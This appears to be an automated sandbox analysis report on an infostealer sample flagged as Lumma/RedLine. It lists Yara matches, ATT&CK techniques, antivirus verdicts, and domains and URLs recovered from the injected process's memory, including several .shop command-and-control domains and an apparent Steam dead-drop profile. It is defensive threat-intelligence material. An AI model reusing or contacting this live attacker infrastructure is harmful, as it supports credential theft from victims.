                Source: Yara matchFile source: 00000002.00000003.2013964863.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1920704083.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7408, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7408, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                311
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Disable or Modify Tools
                LSASS Memory241
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                Virtualization/Sandbox Evasion
                Security Account Manager1
                Process Discovery
                SMB/Windows Admin Shares31
                Data from Local System
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                Process Injection
                NTDS141
                Virtualization/Sandbox Evasion
                Distributed Component Object Model2
                Clipboard Data
                114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information
                Cached Domain Credentials23
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Armanivenntii_crypted_EASY.exe63%ReversingLabsByteCode-MSIL.Ransomware.RedLine
                Armanivenntii_crypted_EASY.exe100%AviraTR/AVI.Lumma.dplvj
                Armanivenntii_crypted_EASY.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\d3d9x.dll100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\d3d9x.dll66%ReversingLabsWin32.Trojan.Midie
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/api(0%Avira URL Cloudsafe
                https://lev-tolstoi.com/P0%Avira URL Cloudsafe
                https://lev-tolstoi.com/h0%Avira URL Cloudsafe
                https://lev-tolstoi.com/yo0%Avira URL Cloudsafe
                southedhiscuso.shop0%Avira URL Cloudsafe
                cagedwifedsozm.shop100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apial0%Avira URL Cloudsafe
                https://lev-tolstoi.com:443/apiapi0%Avira URL Cloudsafe
                weaknessmznxo.shop100%Avira URL Cloudmalware
                consciousourwi.shop100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apidows6$0%Avira URL Cloudsafe
                https://lev-tolstoi.com/sj0%Avira URL Cloudsafe
                weiggheticulop.shop100%Avira URL Cloudmalware
                potentioallykeos.shop100%Avira URL Cloudmalware
                interactiedovspm.shop100%Avira URL Cloudmalware
                https://lev-tolstoi.com/;~0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apiH0%Avira URL Cloudsafe
                https://southedhiscuso.shop:443/api100%Avira URL Cloudmalware
                https://lev-tolstoi.com/90%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                23.55.153.106
                truefalse
                  high
                  lev-tolstoi.com
                  172.67.157.254
                  truefalse
                    high
                    potentioallykeos.shop
                    unknown
                    unknowntrue
                      unknown
                      consciousourwi.shop
                      unknown
                      unknowntrue
                        unknown
                        southedhiscuso.shop
                        unknown
                        unknowntrue
                          unknown
                          interactiedovspm.shop
                          unknown
                          unknowntrue
                            unknown
                            weaknessmznxo.shop
                            unknown
                            unknowntrue
                              unknown
                              charecteristicdxp.shop
                              unknown
                              unknowntrue
                                unknown
                                weiggheticulop.shop
                                unknown
                                unknowntrue
                                  unknown
                                  deicedosmzj.shop
                                  unknown
                                  unknowntrue
                                    unknown
                                    cagedwifedsozm.shop
                                    unknown
                                    unknowntrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      weaknessmznxo.shoptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      cagedwifedsozm.shoptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      southedhiscuso.shoptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        high
                                        consciousourwi.shoptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://lev-tolstoi.com/apifalse
                                          high
                                          weiggheticulop.shoptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          potentioallykeos.shoptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          interactiedovspm.shoptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://steamcommunity.com/?subsection=broadcastsaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://lev-tolstoi.com/yoaspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://lev-tolstoi.com/apialaspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://lev-tolstoi.com/api(aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://lev-tolstoi.com/Paspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englaspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://lev-tolstoi.com/haspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxxaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://lev-tolstoi.com:443/apiapiaspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://lev-tolstoi.com/aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://southedhiscuso.shop:443/apiaspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaaspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lev-tolstoi.com/sjaspnet_regiis.exe, 00000002.00000003.2021686347.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1965527761.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1964908973.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1965112088.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://support.microsofaspnet_regiis.exe, 00000002.00000003.1866541610.000000000503E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 00000002.00000003.1866624782.0000000005010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://store.steampowered.com/about/aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://lev-tolstoi.com/;~aspnet_regiis.exe, 00000002.00000003.2021686347.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://help.steampowered.com/en/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://steamcommunity.com/market/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://store.steampowered.com/news/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/discussions/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/stats/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
